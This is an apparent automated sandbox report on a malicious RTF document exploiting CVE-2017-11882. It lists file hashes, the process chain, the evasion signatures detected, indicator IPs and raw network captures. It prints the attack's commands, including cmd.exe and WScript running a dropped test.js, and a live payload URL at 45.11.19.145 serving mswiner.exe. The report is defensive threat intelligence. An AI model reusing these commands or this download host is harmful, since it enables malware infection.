1312RTF_8d88b86a99486d619c4e98d33c5e8e30_rtf_2019-09-07_21_30.txt

1.  
2. * ID: 1312
3. * MalFamily: "CVE-2017-11882"
4.  
5. * MalScore: 10.0
6.  
7. * File Name: "RTF_8d88b86a99486d619c4e98d33c5e8e30.rtf"
8. * File Size: 21106
9. * File Type: "Rich Text Format data, version 1, ANSI"
10. * SHA256: "f14a49bc21e63284df713b631d0bce8c5c41ba79d897d6b15720ed21af7dc0c0"
11. * MD5: "8d88b86a99486d619c4e98d33c5e8e30"
12. * SHA1: "362d7def11410b2afc3b48fb62a5eeabd6328a8a"
13. * SHA512: "3fd3fac8e21f7e7391a39fc2f412c34ffbda5189870ed87a851608c30019ef43b13b6588cfe40b05ccb5c05e1db90556eb67811b6c48f1bf0838d47368f257a4"
14. * CRC32: "CDDF75A6"
15. * SSDEEP: "96:Mwu1DW24rDJN1xa+DY/e5qFyAuFBX7QRpKzk+p89CU61S461SRM5WGviFa/G5VoE:Tu9KJqHiAvwGvV/GZxlvBfwGvVN"
16.  
17. * Process Execution:
18. "WINWORD.EXE",
19. "svchost.exe",
20. "EQNEDT32.EXE",
21. "EQNEDT32.EXE",
22. "cmd.exe",
23. "wscript.exe",
24. "WmiPrvSE.exe",
25. "explorer.exe"
26.  
27.  
28. * Executed Commands:
29. "\"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE\" -Embedding",
30. "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
31. "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding",
32. "cmd.exe /c%tmp%\\test.js A\\x12\\x0cC",
33. "C:\\Users\\user\\AppData\\Local\\Temp\\test.js A\\x12\\x0cC",
34. "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\user\\AppData\\Local\\Temp\\test.js\" A\\x12\\x0cC",
35. "C:\\Users\\user\\AppData\\Local\\Temp\\test.js A\\x12\\x0cC"
36.  
37.  
38. * Signatures Detected:
39.  
40. "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
41. "Details":
42.  
43.  
44. "Description": "The RTF file contains embedded content",
45. "Details":
46.  
47. "embedded content": "Object 2 index 000000EDh contains embedded object with size 1898 bytes"
48.  
49.  
50. "embedded content": "Object 2 index 000011A8h contains embedded object Equation.3 with size 3584 bytes"
51.  
52.  
53. "embedded content": "Object 2 index 000033E2h contains embedded object Equation.3 with size 3072 bytes"
54.  
55.  
56.  
57.  
58. "Description": "Guard pages use detected - possible anti-debugging.",
59. "Details":
60.  
61.  
62. "Description": "Detected script timer window indicative of sleep style evasion",
63. "Details":
64.  
65. "Window": "WSH-Timer"
66.  
67.  
68.  
69.  
70. "Description": "Attempts to connect to a dead IP:Port (8 unique times)",
71. "Details":
72.  
73. "IP_ioc": "23.60.72.96:443"
74.  
75.  
76. "IP_ioc": "92.123.51.45:443"
77.  
78.  
79. "IP_ioc": "23.217.7.193:443"
80.  
81.  
82. "IP_ioc": "45.11.19.145:80 (unknown)"
83.  
84.  
85. "IP_ioc": "104.18.25.243:80"
86.  
87.  
88. "IP_ioc": "72.21.91.29:80"
89.  
90.  
91. "IP_ioc": "52.109.2.18:443"
92.  
93.  
94. "IP_ioc": "52.109.2.14:443"
95.  
96.  
97.  
98.  
99. "Description": "Performs HTTP requests potentially not found in PCAP.",
100. "Details":
101.  
102. "url_ioc": "45.11.19.145:80//mswiner.exe"
103.  
104.  
105.  
106.  
107. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
108. "Details":
109.  
110. "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
111.  
112.  
113. "suspicious_request_iocs": "http://45.11.19.145/mswiner.exe"
114.  
115.  
116.  
117.  
118. "Description": "Performs some HTTP requests",
119. "Details":
120.  
121. "url_iocs": "http://45.11.19.145/mswiner.exe"
122.  
123.  
124.  
125.  
126. "Description": "A scripting utility was executed",
127. "Details":
128.  
129. "command": "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\user\\AppData\\Local\\Temp\\test.js\" A\\x12\\x0cC"
130.  
131.  
132.  
133.  
134. "Description": "Uses Windows utilities for basic functionality",
135. "Details":
136.  
137. "command": "cmd.exe /c%tmp%\\test.js A\\x12\\x0cC"
138.  
139.  
140.  
141.  
142. "Description": "A document file initiated network communications indicative of a potential exploit or payload download",
143. "Details":
144.  
145. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00~\\x01\\x00\\x00z\\x03\\x01t\\x18\\xaaqo\\xaex\\xb7\\xae\\xbd4ki\\x18!p\\x83\\xedi7\\xber\\x80\\x9a\\xcc6i\\x13cc\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x009\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00 \\x00\\x1e\\x00\\x00\\x1broaming.officeapps.live.com\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
146.  
147.  
148. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xb5\\x94\\x8c-\\xf8\\xa7\\x06\\x02\\x01&\\xd6&g\\xcd\\xa3k^e\\x07\\x15\\xe5\\x89\\x04\\x17tzv\\x99%\\x8a\n(\\xc8\\x06,\\x8a\\x83u/\\x0b'\\x02\\x93\n'\\xbb\\x8a)f\\x84\r\\xe8xj\\x19\\xcab\\xa4\\x1e\\xe7\\xea\\xe57\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x9bx5\\x9a\\x89-gdfl\\x83\\xa8<\\xa6\\x14\\x98\\x8dp\\x9e5)\\xb9\\xaa\\xea`c\\x8b\\x0f\\x93\\x9f~\\x88\\x86p\\x8a\r\\xe4@e\\x0e\\x1c\\xddc\\xed\\xfb\\xaf\\xd3b"
149.  
150.  
151. "http_request": "winword.exe_WSASend_get /mfewtzbnmeswstajbgurdgmcgguabbtbl0v27rvz7lbduom%2fnyb45spuewqu5z1zmijhwmys%2bghunoz7oruetfaceai4elabvpzalrznpjlrv1u%3d http/1.1\r\nconnection: keep-alive\r\naccept: */*\r\nuser-agent: microsoft-cryptoapi/6.1\r\nhost: ocsp.digicert.com\r\n\r\n"
152.  
153.  
154. "http_request": "winword.exe_WSASend_get /mfqwujbqme4wtdajbgurdgmcgguabbrpc1vzt9qvn7bzy3iidtbhla4mkqquwiif1tycsck3fd7%2fhijo5ox%2f%2bn0ce3saagyvv14%2fmepdgh0aaaaabk8%3d http/1.1\r\nconnection: keep-alive\r\naccept: */*\r\nif-modified-since: sat, 23 mar 2019 17:46:18 gmt\r\nif-none-match: \"dd54d75d468"
155.  
156.  
157. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x01p>kd \\xe1\\xb8\\x1eb\\x93\\xc9\\xe6+s\\xbc\\x88k\\x9a\\x1c\\x9f\\xc9\\x8eu\\x0f!\\x96p(|g%\\xb8\\xeb\\x0f*\\xba\\x0c\\x04\\xca|\\x7flk@\\xde\\xb5\\xa4\\xfe\\xda\\xfd\\x84y\\xea?\\xc8\\xe8\\xbff\\xc0\\xb4\\xb29\\xa3\\xc6\\xba\\xdaw\r\\xa1o\\xf7\\x0c\\xdb8\\xc2\\xa8g\\x16\\x03\\xa3\\x15\\x97\\x04\\x8e\\xa3\\x9f\t\\xf0\\x8b\\x1c\\xff\\xbc=\\x05\\xa9=h\\xcb\\xb6\\xa0k\\x96k8v\\x0f\\xb5w\\x80\\xfcru\\x8d\\xf1\\x14p\\xbf\\x9e\\x96\\xdf\\xaehu\\xa53\\x9e\\xd0\\xaf<\\xa5\\xb3s\\x1ag\\x02\\xc6\\xe1xe\\x9d\\x11\\xb3\\xdd#\\xe7\\xf8\\x13u\\xf2%\\xec\\xf3c\\x89\\xda\\xc3\\xbc\\xe2'\\x83v~\\x90\\x04\\xd8\\xf6\\x9c\\x9d\\xd1f\\xe3e\\x95\\xf1y\\xf1\\xbca\\xf8\\x19a\\xca-\\x1b\\xac\\xacsmx`\\x94+vm\\xc4n\\xfert\\x07~\\x93l\\x05\\xcfey<\\xea \\xe4\\xeds>\\xa3d7\\x07\\x08\\x18\\x82\\xef?\\xb9\\xa4\\xde9gt\\xd7\\xba\\xae\\x83\\xf0\\x05\\xd9\\xb1h\\xf0\\xf2\r\\x87\\xff\\x0f\\x97\\x1f\\xef"
158.  
159.  
160. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x02 _d\\xb5\\x0fv\\xbb\\xc3\\x8ath\\x16\\xf2\\x9br7\\xaa\\xe1>p\\e\\xe1s9\\x02\\xcfr;18\\xf2\\xb4\\xc8c\\x94k\\x10\\x11\n\\xd7v\r\\x82\\xf8q\\xae\\xa0\\x93\\xban\\xdei\\xee\\xc7\\x12\\xb1dh\\xcb^md\\xd2\\xdd>z\\x91\\x9do\\xb0\\xcc\\x92/8\\x90\\xc5%\\x96\\x1f\\x84\\xad\\x89\\x11\\xfc\\xde\\xc9\\xc2\\xa9\\xc9-i8df+\\x8b\\xb9\\x8c\\xaa|\\x12\\xe0\\xab\\xd47\\x89\\xb6<o\\xe7/yn;k\\xd3\\x80ame8\\xa6\\x1a\\xbcxgqh\\x0c\\x9f\\xb6\\xc6\\xd9\\xc6\\xc1\\xe8\\xb5\\xa9\\xc8\\xbe\\xad\\xc5\\xadx\\x1e\\x9c\\xa8\\x83^\\xe9 \\xb12d\\xd6a\\x19\\x1f\\x8e\\xce\\x13\\x04\\x10z%\\xb1k'p\\xe4\\x91b\\xff\\x821\\x1f\\xbb\\xc9\\xe2\\x1b\\x0b\\x9d\\xb06j/p\\xee\\xc8\\x8a\\x04=\\xa5\\x11\\xcc\\x8fh\\xbf\\x06si\\x7f\\xe61\\xda\\x0f\\xba.\\x12\t\\x18\\x02\\x1eo\\x06a\\x8e\\xf2\\xc0\\x8e\\x14\\x9c\\x11\\x18\\xbb\\xa8j\\xac\\xc4\\x81\\x8f\\x89\\xa4\\xbd*\\x1a\\xca0n\\xa4\t\nnk/ji\\x83"
161.  
162.  
163. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00z\\x01\\x00\\x00v\\x03\\x01t\\x18\\xafid\\x86\\xef\\x9a!\\x10\\x87\\xd2\\xfc\\xba4\\x89\\xcd&o\r1|\\x9f\\xbc\\x7f\ny\\xd9k\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x005\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00\\x1c\\x00\\x1a\\x00\\x00\\x17odc.officeapps.live.com\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
164.  
165.  
166. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xc7\\xcd\\xdaj\\xf1\\x80\\xc8\\xbddt\\x07z4\\xbb>\\xe7\\x8a(c.g\\x1e\\xe5\\x04\\xe4\\xc5%\\xfc73\\x15%dk\\x15(>\\xe6x\\xea\\x02\\xd5i\\x07\\x93\\x03\\xf9^\\x0cf5\\x82\\xc2\\xdb\\xc8p\\xb3\\x00\\xae\\xa8n\\xebk\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000n\\xf4\\xb4\\xa8\\x1c6cu\\x18\\xee.4\\xae%\\x88+#\\xc1\\xea\\xca\\xbaa\\xb7\\x92\\x81\\xa4\\x19\\xa5uy\\xaf\\x17\\x99\\xc84\\x01\\x8da\\x00b'pn1\\x11$"
167.  
168.  
169. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x01px\\xa0\\x1a\\x94\\xb3|\\x00\\x02\\x04\\xba\\xa8\\x16\\xb5\\x92\\xc9\\x87\\x18<\\xaa\\xbd\\x92\\xc3\\x01\\x9a;\\xbb|\\xc2c\\xb0\\xf3\\xa0\\xeac\\x7f\\xfd8\\xc0\\x14g=9\\x01\\xb6\r8u\\xfb\\x084\\x02\\x84ak\\xac\\x82\\x91\\xf9c\\xf7\\x16bk\\x7f\r\\x1b\\x1d\\x1fn\\xdb<\\x9f\\x9b_mhh\\x1a\\xd6\\xb4k\\xe3\\xbdkr\\xe3\\xf0b\\xeb\\x1d\\x12\\xea(\\xd5\"\\x8d\\xe9#s\\x818k\\xdd\\x98\\xbd\\xebsr\\xd2(ds\\xdc\\xae\\x83m1\\xbf%\\x99&\\xbc5\\xa6\\xd3o\\xc84\\xbe\\xbf\\x025\\xed\\xb1&h\\x8c\\x17\\x12\\x885l\\xce\\xf6\\x97\\xd2\r\\xc5\\xb5;\\xb1\\xb0~\\xb2v*nm\\x89\\xdf\\xd8\\xde\\x9d5ro\\xd4\\xf4\\x03jm\\xc5*\\x04>\"\\xe6\\xd0\\x9b\\xc5e\\xf7p(\\xbd\\xdb35+-\\xeda\\xc4\\xe2.\\xfe\\xca-7\\x1b\\x8d\\x10\\xf02`\\x83zo\\x88\\x8e\\xd1t\\x8a\\xc7\\xfd\\xd4\\xeea\\x7f\\xd7\\x1e\\xd7\\x0e\\x8c\\x8f\\x13x\\xaa\\xd2i\\x84\\xff\\x83\\xe4\\x04\\x05\"\\xd8\t\\xb5\\xcb\\xde\\xfdd\\xff\\x18<"
170.  
171.  
172. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x01\\x00\\x00y\\x03\\x01t\\x18\\xb4\\x0f\\x8c8\\x17nj~gt\\x18\\x1f\\x98\\x8a\\xe7)\\xc6\\x04\\xa4a\\x1a\\xb8k\\xa4\\xc5s<\\x0c\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x008\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00\\x1f\\x00\\x1d\\x00\\x00\\x1atemplateservice.office.com\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
173.  
174.  
175. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x042~\\x89\\xf9\\xfb\\xc5\\xb8\\xb33\\xba>.u\\xf1\\x05\\x1f\\xf1\\xc4\\xce\\x1fq\\xb0#l\\x05\n:\\xff\\xb2\\xc2+\\xe9\\xc8\\x07\\xc5\\xd0k\\xfbm\\xb2\\xb5$\\x1cg\\xe6\\xe4\\x1d4-\\xdb\\xbe\\xba\\xc9\\x80\\x85\\xd7\\xee\\xdb\\xd9\\xa4y\\x91\\x8b\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000j\\x91d\\xae4\\xe9\\x07\\xb7\\xd0\\xa7\\xdc3\\xfcj.\\x8d\\xc1\\xad\\xf5\\x98\\x9c\\xe1\\xce\\xac\\x1c<1e\\xef?\\x904\\x8a\\x16\\xff\\x0ev\\x1a\\x1ak\\x0fd\\x03\\xb3\\xba\\x1b\\xaf"
176.  
177.  
178. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x01p\\xf65\\x00\\xfbzl\\xe63\\xbe\\xc9\\x14\\xcd\\x07\\xb9\\xa9h\\xe5\\x11g\\xbf\\xd2\\x1b\\xfa\\x99`\\x91i\\xe7m\\xa2\\xcf\\x13nh\\xb1\\xb2\\x14\\xd3s5\\xbc\\xfe\\xee\\xae\\xd7,\\xe0z\\xf8\\xc8+\\xf6\\x90\\xf7\\xdb\\x7f\\xc0\\xd4\\x94\\xc0\\x9a:\\xc2\\xc3`\\xc7\\x8co\\xb6\\x93\\xac\\xc0\\xe2/v\\x88\\xa0\\x07\t\\x9ac\\x0c\\x86\\xff\\xaas\\xf5x\\x9fl\\xf1\\xd2$\\xdd\\xb8\\xd0\\x8e\\x8a\\xd3)\\x81\\xf3\\x15@\\xf7\\x9c\\xb8\\x93m\\xd5gd\\xe2\\xfa\\xa0\\x84\\xed\\xe7\\xd2'\\xb7y`a\\x17\\x8a5\\x93d\\xe5\\x91\\xb4\\xb1\\x95\\xa2\\xae\\x93\\xda\\xba^\\xc5q0\\xbdb\\xcb\\xccx\\x0ff\\x06\\xd7\\xb4\\xee\\x80\\x84\\xf8\\xb1`\\x05\\x8cc\\xa0\\x97o\\x87)\\x11\\xf8#h\\xa9t\\xf7\\x08\\x189.\\xa2\\\\x06)\\xc5\r\\xb2\\xf0cc\\xee\\xf4\\xa1\\xa2\\xdf\\x9e\\x90\\x93!\\xa6\\xe9\\x08\\x13\\xd7\\xcf\\xbf\\xbd\\x19\\xd9\\xa1%\\x1b\\xa6p\\xdc\\xa9\\xd0\\x08t;\n:j\\x01r\\x0b\\x05\\xaa\\x9c\\xfb\\x97sz\\xb7\\xa7\\xba; 0\td:\\x97bfr\\xcb\\x86o\\xc1/"
179.  
180.  
181. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\x83\\xf8\\xc1\\xa06\\xfa\\x04wi\\x7f$h\n\\xa5u\\xc6l\\x14\\x94\\xe9y\\xa2\\x98\\x0e78\\xb3\\xd4\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
182.  
183.  
184. "http_request": "winword.exe_WSASend_\\xff\\xff\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\x16\\xb6\\xecx\\xf50-<\\x9e\\x8b\\xee\\xf3\\x05\\xcc\\xd8\\xfd\\xcc1\\xef\\xabr\\xeb^8\\xbe\\xf9\\xa5\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
185.  
186.  
187. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\xfe\\xa5#\\xae\\x90#\\xe9/\\xcd \\x12w\\xf8\\xe9m\\xf8\\xf2l\"#b~c\\xf6\\x11\\xfbp\\x97\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
188.  
189.  
190. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\xc6\\xf8\\x9el\\x95\\xaba\\xd3dg5\\x0b\\x89;\\xb0\\x0e\\xc0\\x92\\xdf\\x0b\\xee\\xb8\\xcd\\x1d\\xa8\\xbc<m\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
191.  
192.  
193. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5n\\xbe\r\\x0e4efi jr\\x8c\\xe4\\xb3i28\\x9a\\xed\\x82\\x07dc\\xa2\\xb1.f8\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
194.  
195.  
196. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\xff:\\xa4\\x06\\xa3\\x13=\\x9e\\xb2\\xc6\\xc7/\\xa1\\xff\\xf6\\xba0\\x80\\x7f\\xbcj\\xa3\\x1e\\xfe\\x90\\xb0\\x04\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
197.  
198.  
199. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5p\\xa9*:\\xa3\\xd7\\x1ek\\x1e\\xd3etu\\xeb%\\xe7\\xa4u<?\\xe1\\xa3\\xff\\x99\\xc6\\x86\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
200.  
201.  
202. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\x0f\\x0b\\xc4^\\x94\\xd4,\\xd7\\x8e\\xd1\\xdc\\xb4\\xd2dw\\xb4\\xb5\"\\xfe\\xb4\"\\xbbg\\x1ai\\xa82\\x9a\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
203.  
204.  
205. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5cpc\\xab\\xdd#4\\xce)\\x1a\\xae\\xa3\\xb7\\xb6\\x1e\\xce~;\\xc4\\xcd^\\xbb\\xce\\xee\\x0c\\x14\\x97\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
206.  
207.  
208. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\xda\\xdbl7\\xe3\\xb2\\xe5\\xd5\\x93\\xaf\\x90\\xbd@\\xade\\xc7\\xd8\\x08\\xbc\\x81\\xfa\\xa0\\x97o\\xd1:\\x03\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
209.  
210.  
211. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5f8\\x1e\\xac\\x07\\xac\\xaf\\x0e\\x08!i\\xc2\\x99\\x05\\xf7o:s\\x1a\\xe02z5\\x17`\\xc6\"\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
212.  
213.  
214. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5t\\xc8\\x90\\x88r(ediw\\xb3\\xbe\\x84\\xbez\\xd9\\xff\\x14\\xe3\\x04\\xf9\\x9b:\\xd8\\xe9\\x7fj\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
215.  
216.  
217. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\x83\\x90\\xabb\\xee@\\xb6\\xc7\\x87\\x14x|\\xe6sw\\xd5'td\\xffkq\\xb9:\\x91\\xf3\\xcb\\xa2\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
218.  
219.  
220. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\x97k\\xff\\x89\\x19\\x15\\\\x87\\xfc\\xef\\x038+3\\xac\\x97\\xd3\\x072#$n'\\xb9h\\xf1\\xfc\\xb6\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
221.  
222.  
223. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\x9d\\x81\\x91z=)\\xf2/\\xf4\\xaa\\xe5\\xa0\\x07\\x01&\\x88\\x88\\xbc\\xe5\\xe5\\x98\\xd8\\x1a\\xf5'y^\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
224.  
225.  
